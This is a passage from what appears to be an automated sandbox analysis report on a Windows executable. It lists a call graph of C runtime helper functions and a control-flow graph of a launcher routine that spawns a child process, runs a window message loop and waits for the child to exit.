18978 7ff7b2b81154 18980 7ff7b2b7a504 __CxxCallCatchBlock 45 API calls 18978->18980 18979 7ff7b2b81131 18982 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18979->18982 18981 7ff7b2b8115a 18980->18981 18982->18983 18983->18833 18984 7ff7b2b7eb98 _get_daylight 11 API calls 18984->18985 18985->18978 18985->18979 18985->18984 18986 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18985->18986 18987 7ff7b2b80474 37 API calls 18985->18987 18988 7ff7b2b81140 18985->18988 18986->18985 18987->18985 18989 7ff7b2b7a900 _isindst 17 API calls 18988->18989 18989->18978 18991 7ff7b2b7970c 18990->18991 18992 7ff7b2b79715 18990->18992 18991->18992 19346 7ff7b2b7920c 18991->19346 18992->18848 18992->18849 18997 7ff7b2b86ff9 18996->18997 19001 7ff7b2b87026 18996->19001 18998 7ff7b2b86ffe 18997->18998 18997->19001 18999 7ff7b2b74f08 _get_daylight 11 API calls 18998->18999 19002 7ff7b2b87003 18999->19002 19000 7ff7b2b8706a 19003 7ff7b2b74f08 _get_daylight 11 API calls 19000->19003 19001->19000 19004 7ff7b2b87089 19001->19004 19018 7ff7b2b8705e __crtLCMapStringW 19001->19018 19005 7ff7b2b7a8e0 _invalid_parameter_noinfo 37 API calls 19002->19005 19006 7ff7b2b8706f 19003->19006 19007 7ff7b2b870a5 19004->19007 19008 7ff7b2b87093 19004->19008 19009 7ff7b2b8700e 19005->19009 19012 7ff7b2b7a8e0 _invalid_parameter_noinfo 37 API calls 19006->19012 19011 7ff7b2b74f4c 45 API calls 19007->19011 19010 7ff7b2b74f08 _get_daylight 11 API calls 19008->19010 19009->18846 19013 7ff7b2b87098 19010->19013 19014 7ff7b2b870b2 19011->19014 19012->19018 19015 7ff7b2b7a8e0 _invalid_parameter_noinfo 37 API calls 19013->19015 19014->19018 19393 7ff7b2b88b08 19014->19393 19015->19018 19018->18846 19019 7ff7b2b74f08 _get_daylight 11 API calls 19019->19018 19021 7ff7b2b791b1 19020->19021 19034 7ff7b2b791ad 19020->19034 19043 7ff7b2b825f0 19021->19043 19026 7ff7b2b791c3 19028 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19026->19028 19027 7ff7b2b791cf 19069 7ff7b2b7927c 19027->19069 19028->19034 19031 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19032 7ff7b2b791f6 19031->19032 19033 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19032->19033 19033->19034 19034->18906 19035 7ff7b2b794ec 19034->19035 19036 7ff7b2b79515 19035->19036 19041 7ff7b2b7952e 19035->19041 19036->18906 19037 7ff7b2b807e8 WideCharToMultiByte 19037->19041 19038 7ff7b2b7eb98 _get_daylight 11 API calls 19038->19041 19039 7ff7b2b795be 19040 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19039->19040 19040->19036 19041->19036 19041->19037 19041->19038 19041->19039 19042 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19041->19042 19042->19041 19044 7ff7b2b825fd 19043->19044 19048 7ff7b2b791b6 19043->19048 19088 7ff7b2b7b224 19044->19088 19049 7ff7b2b8292c GetEnvironmentStringsW 19048->19049 19050 7ff7b2b791bb 19049->19050 19051 7ff7b2b8295c 19049->19051 19050->19026 19050->19027 19052 7ff7b2b807e8 WideCharToMultiByte 19051->19052 19053 7ff7b2b829ad 19052->19053 19054 7ff7b2b829b4 FreeEnvironmentStringsW 19053->19054 19055 7ff7b2b7d5fc _fread_nolock 12 API calls 19053->19055 19054->19050 19056 7ff7b2b829c7 19055->19056 19057 7ff7b2b829d8 19056->19057 19058 7ff7b2b829cf 19056->19058 19060 7ff7b2b807e8 WideCharToMultiByte 19057->19060 19059 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19058->19059 19061 7ff7b2b829d6 19059->19061 19062 7ff7b2b829fb 19060->19062 19061->19054 19063 7ff7b2b82a09 19062->19063 19064 7ff7b2b829ff 19062->19064 19066 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19063->19066 19065 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19064->19065 19067 7ff7b2b82a07 FreeEnvironmentStringsW 19065->19067 19066->19067 19067->19050 19070 7ff7b2b792a1 19069->19070 19071 7ff7b2b7eb98 _get_daylight 11 API calls 19070->19071 19083 7ff7b2b792d7 19071->19083 19072 7ff7b2b792df 19073 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19072->19073 19074 7ff7b2b791d7 19073->19074 19074->19031 19075 7ff7b2b79352 19076 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19075->19076 19076->19074 19077 7ff7b2b7eb98 _get_daylight 11 API calls 19077->19083 19078 7ff7b2b79341 19247 7ff7b2b794a8 19078->19247 19079 7ff7b2b7a4a4 __std_exception_copy 37 API calls 19079->19083 19082 7ff7b2b79377 19085 7ff7b2b7a900 _isindst 17 API calls 19082->19085 19083->19072 19083->19075 19083->19077 19083->19078 19083->19079 19083->19082 19086 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19083->19086 19084 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19084->19072 19087 7ff7b2b7938a 19085->19087 19086->19083 19089 7ff7b2b7b235 FlsGetValue 19088->19089 19090 7ff7b2b7b250 FlsSetValue 19088->19090 19091 7ff7b2b7b24a 19089->19091 19092 7ff7b2b7b242 19089->19092 19090->19092 19093 7ff7b2b7b25d 19090->19093 19091->19090 19094 7ff7b2b7b248 19092->19094 19095 7ff7b2b7a504 __CxxCallCatchBlock 45 API calls 19092->19095 19096 7ff7b2b7eb98 _get_daylight 11 API calls 19093->19096 19108 7ff7b2b822c4 19094->19108 19097 7ff7b2b7b2c5 19095->19097 19098 7ff7b2b7b26c 19096->19098 19099 7ff7b2b7b28a FlsSetValue 19098->19099 19100 7ff7b2b7b27a FlsSetValue 19098->19100 19102 7ff7b2b7b2a8 19099->19102 19103 7ff7b2b7b296 FlsSetValue 19099->19103 19101 7ff7b2b7b283 19100->19101 19104 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19101->19104 19105 7ff7b2b7aef4 _get_daylight 11 API calls 19102->19105 19103->19101 19104->19092 19106 7ff7b2b7b2b0 19105->19106 19107 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19106->19107 19107->19094 19131 7ff7b2b82534 19108->19131 19110 7ff7b2b822f9 19146 7ff7b2b81fc4 19110->19146 19113 7ff7b2b7d5fc _fread_nolock 12 API calls 19114 7ff7b2b82327 19113->19114 19115 7ff7b2b8232f 19114->19115 19118 7ff7b2b8233e 19114->19118 19116 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19115->19116 19117 7ff7b2b82316 19116->19117 19117->19048 19153 7ff7b2b8266c 19118->19153 19121 7ff7b2b8243a 19122 7ff7b2b74f08 _get_daylight 11 API calls 19121->19122 19123 7ff7b2b8243f 19122->19123 19125 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19123->19125 19124 7ff7b2b82495 19127 7ff7b2b824fc 19124->19127 19164 7ff7b2b81df4 19124->19164 19125->19117 19126 7ff7b2b82454 19126->19124 19129 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19126->19129 19128 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19127->19128 19128->19117 19129->19124 19132 7ff7b2b82557 19131->19132 19133 7ff7b2b82561 19132->19133 19179 7ff7b2b802d8 EnterCriticalSection 19132->19179 19136 7ff7b2b825d3 19133->19136 19139 7ff7b2b7a504 __CxxCallCatchBlock 45 API calls 19133->19139 19136->19110 19141 7ff7b2b825eb 19139->19141 19142 7ff7b2b82642 19141->19142 19143 7ff7b2b7b224 50 API calls 19141->19143 19142->19110 19144 7ff7b2b8262c 19143->19144 19145 7ff7b2b822c4 65 API calls 19144->19145 19145->19142 19147 7ff7b2b74f4c 45 API calls 19146->19147 19148 7ff7b2b81fd8 19147->19148 19149 7ff7b2b81ff6 19148->19149 19150 7ff7b2b81fe4 GetOEMCP 19148->19150 19151 7ff7b2b8200b 19149->19151 19152 7ff7b2b81ffb GetACP 19149->19152 19150->19151 19151->19113 19151->19117 19152->19151 19154 7ff7b2b81fc4 47 API calls 19153->19154 19155 7ff7b2b82699 19154->19155 19156 7ff7b2b827ef 19155->19156 19158 7ff7b2b826d6 IsValidCodePage 19155->19158 19163 7ff7b2b826f0 __scrt_get_show_window_mode 19155->19163 19157 7ff7b2b6c550 _log10_special 8 API calls 19156->19157 19159 7ff7b2b82431 19157->19159 19158->19156 19160 7ff7b2b826e7 19158->19160 19159->19121 19159->19126 19161 7ff7b2b82716 GetCPInfo 19160->19161 19160->19163 19161->19156 19161->19163 19180 7ff7b2b820dc 19163->19180 19246 7ff7b2b802d8 EnterCriticalSection 19164->19246 19181 7ff7b2b82119 GetCPInfo 19180->19181 19182 7ff7b2b8220f 19180->19182 19181->19182 19188 7ff7b2b8212c 19181->19188 19183 7ff7b2b6c550 _log10_special 8 API calls 19182->19183 19185 7ff7b2b822ae 19183->19185 19184 7ff7b2b82e40 48 API calls 19186 7ff7b2b821a3 19184->19186 19185->19156 19191 7ff7b2b87b84 19186->19191 19188->19184 19190 7ff7b2b87b84 54 API calls 19190->19182 19192 7ff7b2b74f4c 45 API calls 19191->19192 19193 7ff7b2b87ba9 19192->19193 19196 7ff7b2b87850 19193->19196 19197 7ff7b2b87891 19196->19197 19198 7ff7b2b7f8a0 _fread_nolock MultiByteToWideChar 19197->19198 19201 7ff7b2b878db 19198->19201 19199 7ff7b2b87b59 19200 7ff7b2b6c550 _log10_special 8 API calls 19199->19200 19202 7ff7b2b821d6 19200->19202 19201->19199 19203 7ff7b2b7d5fc _fread_nolock 12 API calls 19201->19203 19205 7ff7b2b87913 19201->19205 19215 7ff7b2b87a11 19201->19215 19202->19190 19203->19205 19204 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19204->19199 19206 7ff7b2b7f8a0 _fread_nolock MultiByteToWideChar 19205->19206 19205->19215 19207 7ff7b2b87986 19206->19207 19207->19215 19227 7ff7b2b7f0e4 19207->19227 19210 7ff7b2b87a22 19212 7ff7b2b87af4 19210->19212 19213 7ff7b2b7d5fc _fread_nolock 12 API calls 19210->19213 19217 7ff7b2b87a40 19210->19217 19211 7ff7b2b879d1 19214 7ff7b2b7f0e4 __crtLCMapStringW 6 API calls 19211->19214 19211->19215 19212->19215 19216 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19212->19216 19213->19217 19214->19215 19215->19199 19215->19204 19216->19215 19217->19215 19218 7ff7b2b7f0e4 __crtLCMapStringW 6 API calls 19217->19218 19219 7ff7b2b87ac0 19218->19219 19219->19212 19220 7ff7b2b87af6 19219->19220 19221 7ff7b2b87ae0 19219->19221 19223 7ff7b2b807e8 WideCharToMultiByte 19220->19223 19222 7ff7b2b807e8 WideCharToMultiByte 19221->19222 19224 7ff7b2b87aee 19222->19224 19223->19224 19224->19212 19225 7ff7b2b87b0e 19224->19225 19225->19215 19226 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19225->19226 19226->19215 19233 7ff7b2b7ed10 19227->19233 19230 7ff7b2b7f12a 19230->19210 19230->19211 19230->19215 19232 7ff7b2b7f193 LCMapStringW 19232->19230 19234 7ff7b2b7ed6d 19233->19234 19236 7ff7b2b7ed68 __vcrt_FlsAlloc 19233->19236 19234->19230 19243 7ff7b2b7f1d0 19234->19243 19235 7ff7b2b7ed9d LoadLibraryExW 19238 7ff7b2b7ee72 19235->19238 19239 7ff7b2b7edc2 GetLastError 19235->19239 19236->19234 19236->19235 19237 7ff7b2b7ee92 GetProcAddress 19236->19237 19242 7ff7b2b7edfc LoadLibraryExW 19236->19242 19237->19234 19241 7ff7b2b7eea3 19237->19241 19238->19237 19240 7ff7b2b7ee89 FreeLibrary 19238->19240 19239->19236 19240->19237 19241->19234 19242->19236 19242->19238 19244 7ff7b2b7ed10 __crtLCMapStringW 5 API calls 19243->19244 19245 7ff7b2b7f1fe __crtLCMapStringW 19244->19245 19245->19232 19248 7ff7b2b794ad 19247->19248 19249 7ff7b2b79349 19247->19249 19250 7ff7b2b794d6 19248->19250 19251 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19248->19251 19249->19084 19252 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19250->19252 19251->19248 19252->19249 19254 7ff7b2b862d8 19253->19254 19255 7ff7b2b862c1 19253->19255 19254->19255 19258 7ff7b2b862e6 19254->19258 19256 7ff7b2b74f08 _get_daylight 11 API calls 19255->19256 19257 7ff7b2b862c6 19256->19257 19259 7ff7b2b7a8e0 _invalid_parameter_noinfo 37 API calls 19257->19259 19260 7ff7b2b862d1 19258->19260 19261 7ff7b2b74f4c 45 API calls 19258->19261 19259->19260 19260->18922 19261->19260 19263 7ff7b2b74f4c 45 API calls 19262->19263 19264 7ff7b2b88f71 19263->19264 19267 7ff7b2b88bc8 19264->19267 19269 7ff7b2b88c16 19267->19269 19268 7ff7b2b6c550 _log10_special 8 API calls 19270 7ff7b2b87205 19268->19270 19271 7ff7b2b88c9d 19269->19271 19273 7ff7b2b88c88 GetCPInfo 19269->19273 19294 7ff7b2b88ca1 19269->19294 19270->18922 19270->18946 19272 7ff7b2b7f8a0 _fread_nolock MultiByteToWideChar 19271->19272 19271->19294 19274 7ff7b2b88d35 19272->19274 19273->19271 19273->19294 19275 7ff7b2b7d5fc _fread_nolock 12 API calls 19274->19275 19276 7ff7b2b88d6c 19274->19276 19274->19294 19275->19276 19277 7ff7b2b7f8a0 _fread_nolock MultiByteToWideChar 19276->19277 19276->19294 19278 7ff7b2b88dda 19277->19278 19279 7ff7b2b88ebc 19278->19279 19280 7ff7b2b7f8a0 _fread_nolock MultiByteToWideChar 19278->19280 19281 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19279->19281 19279->19294 19282 7ff7b2b88e00 19280->19282 19281->19294 19282->19279 19283 7ff7b2b7d5fc _fread_nolock 12 API calls 19282->19283 19284 7ff7b2b88e2d 19282->19284 19283->19284 19284->19279 19285 7ff7b2b7f8a0 _fread_nolock MultiByteToWideChar 19284->19285 19286 7ff7b2b88ea4 19285->19286 19287 7ff7b2b88ec4 19286->19287 19288 7ff7b2b88eaa 19286->19288 19296 7ff7b2b7ef68 19287->19296 19288->19279 19291 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19288->19291 19291->19279 19292 7ff7b2b88f03 19292->19294 19295 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19292->19295 19293 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19293->19292 19294->19268 19295->19294 19297 7ff7b2b7ed10 __crtLCMapStringW 5 API calls 19296->19297 19298 7ff7b2b7efa6 19297->19298 19299 7ff7b2b7efae 19298->19299 19300 7ff7b2b7f1d0 __crtLCMapStringW 5 API calls 19298->19300 19299->19292 19299->19293 19301 7ff7b2b7f017 CompareStringW 19300->19301 19301->19299 19303 7ff7b2b87c5a HeapSize 19302->19303 19304 7ff7b2b87c41 19302->19304 19305 7ff7b2b74f08 _get_daylight 11 API calls 19304->19305 19306 7ff7b2b87c46 19305->19306 19307 7ff7b2b7a8e0 _invalid_parameter_noinfo 37 API calls 19306->19307 19308 7ff7b2b87c51 19307->19308 19308->18951 19310 7ff7b2b87c89 19309->19310 19311 7ff7b2b87c93 19309->19311 19312 7ff7b2b7d5fc _fread_nolock 12 API calls 19310->19312 19313 7ff7b2b87c98 19311->19313 19319 7ff7b2b87c9f _get_daylight 19311->19319 19317 7ff7b2b87c91 19312->19317 19314 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19313->19314 19314->19317 19315 7ff7b2b87ca5 19318 7ff7b2b74f08 _get_daylight 11 API calls 19315->19318 19316 7ff7b2b87cd2 HeapReAlloc 19316->19317 19316->19319 19317->18955 19318->19317 19319->19315 19319->19316 19320 7ff7b2b83590 _get_daylight 2 API calls 19319->19320 19320->19319 19322 7ff7b2b7ed10 __crtLCMapStringW 5 API calls 19321->19322 19323 7ff7b2b7ef44 19322->19323 19323->18959 19325 7ff7b2b754fa 19324->19325 19326 7ff7b2b754d6 19324->19326 19327 7ff7b2b75554 19325->19327 19328 7ff7b2b754ff 19325->19328 19330 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19326->19330 19333 7ff7b2b754e5 19326->19333 19329 7ff7b2b7f8a0 _fread_nolock MultiByteToWideChar 19327->19329 19331 7ff7b2b75514 19328->19331 19328->19333 19334 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19328->19334 19340 7ff7b2b75570 19329->19340 19330->19333 19335 7ff7b2b7d5fc _fread_nolock 12 API calls 19331->19335 19332 7ff7b2b75577 GetLastError 19336 7ff7b2b74e7c _fread_nolock 11 API calls 19332->19336 19333->18963 19333->18964 19334->19331 19335->19333 19339 7ff7b2b75584 19336->19339 19337 7ff7b2b755b2 19337->19333 19338 7ff7b2b7f8a0 _fread_nolock MultiByteToWideChar 19337->19338 19342 7ff7b2b755f6 19338->19342 19343 7ff7b2b74f08 _get_daylight 11 API calls 19339->19343 19340->19332 19340->19337 19341 7ff7b2b755a5 19340->19341 19344 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19340->19344 19345 7ff7b2b7d5fc _fread_nolock 12 API calls 19341->19345 19342->19332 19342->19333 19343->19333 19344->19341 19345->19337 19347 7ff7b2b79225 19346->19347 19348 7ff7b2b79221 19346->19348 19367 7ff7b2b82a3c GetEnvironmentStringsW 19347->19367 19348->18992 19359 7ff7b2b795cc 19348->19359 19351 7ff7b2b7923e 19374 7ff7b2b7938c 19351->19374 19352 7ff7b2b79232 19353 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19352->19353 19353->19348 19356 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19357 7ff7b2b79265 19356->19357 19358 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19357->19358 19358->19348 19360 7ff7b2b795ef 19359->19360 19363 7ff7b2b79606 19359->19363 19360->18992 19361 7ff7b2b7f8a0 MultiByteToWideChar _fread_nolock 19361->19363 19362 7ff7b2b7eb98 _get_daylight 11 API calls 19362->19363 19363->19360 19363->19361 19363->19362 19364 7ff7b2b7967a 19363->19364 19366 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19363->19366 19365 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19364->19365 19365->19360 19366->19363 19368 7ff7b2b7922a 19367->19368 19371 7ff7b2b82a60 19367->19371 19368->19351 19368->19352 19369 7ff7b2b7d5fc _fread_nolock 12 API calls 19370 7ff7b2b82a97 memcpy_s 19369->19370 19372 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19370->19372 19371->19369 19373 7ff7b2b82ab7 FreeEnvironmentStringsW 19372->19373 19373->19368 19375 7ff7b2b793b4 19374->19375 19376 7ff7b2b7eb98 _get_daylight 11 API calls 19375->19376 19387 7ff7b2b793ef 19376->19387 19377 7ff7b2b793f7 19378 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19377->19378 19379 7ff7b2b79246 19378->19379 19379->19356 19380 7ff7b2b79471 19381 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19380->19381 19381->19379 19382 7ff7b2b7eb98 _get_daylight 11 API calls 19382->19387 19383 7ff7b2b79460 19384 7ff7b2b794a8 11 API calls 19383->19384 19386 7ff7b2b79468 19384->19386 19385 7ff7b2b80474 37 API calls 19385->19387 19389 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19386->19389 19387->19377 19387->19380 19387->19382 19387->19383 19387->19385 19388 7ff7b2b79494 19387->19388 19390 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19387->19390 19391 7ff7b2b7a900 _isindst 17 API calls 19388->19391 19389->19377 19390->19387 19392 7ff7b2b794a6 19391->19392 19394 7ff7b2b88b31 __crtLCMapStringW 19393->19394 19395 7ff7b2b870ee 19394->19395 19396 7ff7b2b7ef68 6 API calls 19394->19396 19395->19018 19395->19019 19396->19395 19747 7ff7b2b7afd0 19748 7ff7b2b7afd5 19747->19748 19749 7ff7b2b7afea 19747->19749 19753 7ff7b2b7aff0 19748->19753 19754 7ff7b2b7b03a 19753->19754 19755 7ff7b2b7b032 19753->19755 19756 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19754->19756 19757 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19755->19757 19758 7ff7b2b7b047 19756->19758 19757->19754 19759 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19758->19759 19760 7ff7b2b7b054 19759->19760 19761 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19760->19761 19762 7ff7b2b7b061 19761->19762 19763 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19762->19763 19764 7ff7b2b7b06e 19763->19764 19765 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19764->19765 19766 7ff7b2b7b07b 19765->19766 19767 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19766->19767 19768 7ff7b2b7b088 19767->19768 19769 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19768->19769 19770 7ff7b2b7b095 19769->19770 19771 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19770->19771 19772 7ff7b2b7b0a5 19771->19772 19773 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19772->19773 19774 7ff7b2b7b0b5 19773->19774 19779 7ff7b2b7ae94 19774->19779 19793 7ff7b2b802d8 EnterCriticalSection 19779->19793 19920 7ff7b2b79d50 19923 7ff7b2b79ccc 19920->19923 19930 7ff7b2b802d8 EnterCriticalSection 19923->19930 19934 7ff7b2b6cb50 19935 7ff7b2b6cb60 19934->19935 19951 7ff7b2b79ba8 19935->19951 19937 7ff7b2b6cb6c 19957 7ff7b2b6ce48 19937->19957 19939 7ff7b2b6cbd9 19941 7ff7b2b6d12c 7 API calls 19939->19941 19950 7ff7b2b6cbf5 19939->19950 19940 7ff7b2b6cb84 _RTC_Initialize 19940->19939 19962 7ff7b2b6cff8 19940->19962 19942 7ff7b2b6cc05 19941->19942 19944 7ff7b2b6cb99 19965 7ff7b2b79014 19944->19965 19952 7ff7b2b79bb9 19951->19952 19953 7ff7b2b74f08 _get_daylight 11 API calls 19952->19953 19954 7ff7b2b79bc1 19952->19954 19955 7ff7b2b79bd0 19953->19955 19954->19937 19956 7ff7b2b7a8e0 _invalid_parameter_noinfo 37 API calls 19955->19956 19956->19954 19958 7ff7b2b6ce59 19957->19958 19961 7ff7b2b6ce5e __scrt_release_startup_lock 19957->19961 19959 7ff7b2b6d12c 7 API calls 19958->19959 19958->19961 19960 7ff7b2b6ced2 19959->19960 19961->19940 19990 7ff7b2b6cfbc 19962->19990 19964 7ff7b2b6d001 19964->19944 19966 7ff7b2b79034 19965->19966 19967 7ff7b2b6cba5 19965->19967 19968 7ff7b2b7903c 19966->19968 19969 7ff7b2b79052 GetModuleFileNameW 19966->19969 19967->19939 19989 7ff7b2b6d0cc InitializeSListHead 19967->19989 19970 7ff7b2b74f08 _get_daylight 11 API calls 19968->19970 19973 7ff7b2b7907d 19969->19973 19971 7ff7b2b79041 19970->19971 19972 7ff7b2b7a8e0 _invalid_parameter_noinfo 37 API calls 19971->19972 19972->19967 20005 7ff7b2b78fb4 19973->20005 19976 7ff7b2b790c5 19977 7ff7b2b74f08 _get_daylight 11 API calls 19976->19977 19978 7ff7b2b790ca 19977->19978 19981 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19978->19981 19979 7ff7b2b790dd 19980 7ff7b2b790ff 19979->19980 19983 7ff7b2b7912b 19979->19983 19984 7ff7b2b79144 19979->19984 19982 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19980->19982 19981->19967 19982->19967 19985 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19983->19985 19987 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19984->19987 19986 7ff7b2b79134 19985->19986 19988 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19986->19988 19987->19980 19988->19967 19991 7ff7b2b6cfd6 19990->19991 19993 7ff7b2b6cfcf 19990->19993 19994 7ff7b2b7a1ec 19991->19994 19993->19964 19997 7ff7b2b79e28 19994->19997 20004 7ff7b2b802d8 EnterCriticalSection 19997->20004 20006 7ff7b2b79004 20005->20006 20007 7ff7b2b78fcc 20005->20007 20006->19976 20006->19979 20007->20006 20008 7ff7b2b7eb98 _get_daylight 11 API calls 20007->20008 20009 7ff7b2b78ffa 20008->20009 20010 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20009->20010 20010->20006

                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                    Function 00007FF7B2B689E0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257synchronizationwindowregistryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 0 7ff7b2b689e0-7ff7b2b68b26 call 7ff7b2b6c850 call 7ff7b2b69390 SetConsoleCtrlHandler GetStartupInfoW call 7ff7b2b753f0 call 7ff7b2b7a47c call 7ff7b2b7871c call 7ff7b2b753f0 call 7ff7b2b7a47c call 7ff7b2b7871c call 7ff7b2b753f0 call 7ff7b2b7a47c call 7ff7b2b7871c GetCommandLineW CreateProcessW 23 7ff7b2b68b4d-7ff7b2b68b89 RegisterClassW 0->23 24 7ff7b2b68b28-7ff7b2b68b48 GetLastError call 7ff7b2b62c50 0->24 26 7ff7b2b68b8b GetLastError 23->26 27 7ff7b2b68b91-7ff7b2b68be5 CreateWindowExW 23->27 32 7ff7b2b68e39-7ff7b2b68e5f call 7ff7b2b6c550 24->32 26->27 29 7ff7b2b68be7-7ff7b2b68bed GetLastError 27->29 30 7ff7b2b68bef-7ff7b2b68bf4 ShowWindow 27->30 31 7ff7b2b68bfa-7ff7b2b68c0a WaitForSingleObject 29->31 30->31 33 7ff7b2b68c0c 31->33 34 7ff7b2b68c88-7ff7b2b68c8f 31->34 36 7ff7b2b68c10-7ff7b2b68c13 33->36 37 7ff7b2b68c91-7ff7b2b68ca1 WaitForSingleObject 34->37 38 7ff7b2b68cd2-7ff7b2b68cd9 34->38 40 7ff7b2b68c1b-7ff7b2b68c22 36->40 41 7ff7b2b68c15 GetLastError 36->41 42 7ff7b2b68ca7-7ff7b2b68cb7 TerminateProcess 37->42 43 7ff7b2b68df8-7ff7b2b68e02 37->43 44 7ff7b2b68cdf-7ff7b2b68cf5 QueryPerformanceFrequency QueryPerformanceCounter 38->44 45 7ff7b2b68dc0-7ff7b2b68dd9 GetMessageW 38->45 40->37 46 7ff7b2b68c24-7ff7b2b68c41 PeekMessageW 40->46 41->40 51 7ff7b2b68cb9 GetLastError 42->51 52 7ff7b2b68cbf-7ff7b2b68ccd WaitForSingleObject 42->52 49 7ff7b2b68e04-7ff7b2b68e0a DestroyWindow 43->49 50 7ff7b2b68e11-7ff7b2b68e35 GetExitCodeProcess CloseHandle * 2 43->50 53 7ff7b2b68d00-7ff7b2b68d38 MsgWaitForMultipleObjects PeekMessageW 44->53 47 7ff7b2b68ddb-7ff7b2b68de9 TranslateMessage DispatchMessageW 45->47 48 7ff7b2b68def-7ff7b2b68df6 45->48 56 7ff7b2b68c76-7ff7b2b68c86 WaitForSingleObject 46->56 57 7ff7b2b68c43-7ff7b2b68c74 TranslateMessage DispatchMessageW PeekMessageW 46->57 47->48 48->43 48->45 49->50 50->32 51->52 52->43 54 7ff7b2b68d3a 53->54 55 7ff7b2b68d73-7ff7b2b68d7a 53->55 58 7ff7b2b68d40-7ff7b2b68d71 TranslateMessage DispatchMessageW PeekMessageW 54->58 55->45 59 7ff7b2b68d7c-7ff7b2b68da5 QueryPerformanceCounter 55->59 56->34 56->36 57->56 57->57 58->55 58->58 59->53 60 7ff7b2b68dab-7ff7b2b68db2 59->60 60->43 61 7ff7b2b68db4-7ff7b2b68db8 60->61 61->45
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2465264032.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2465227661.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
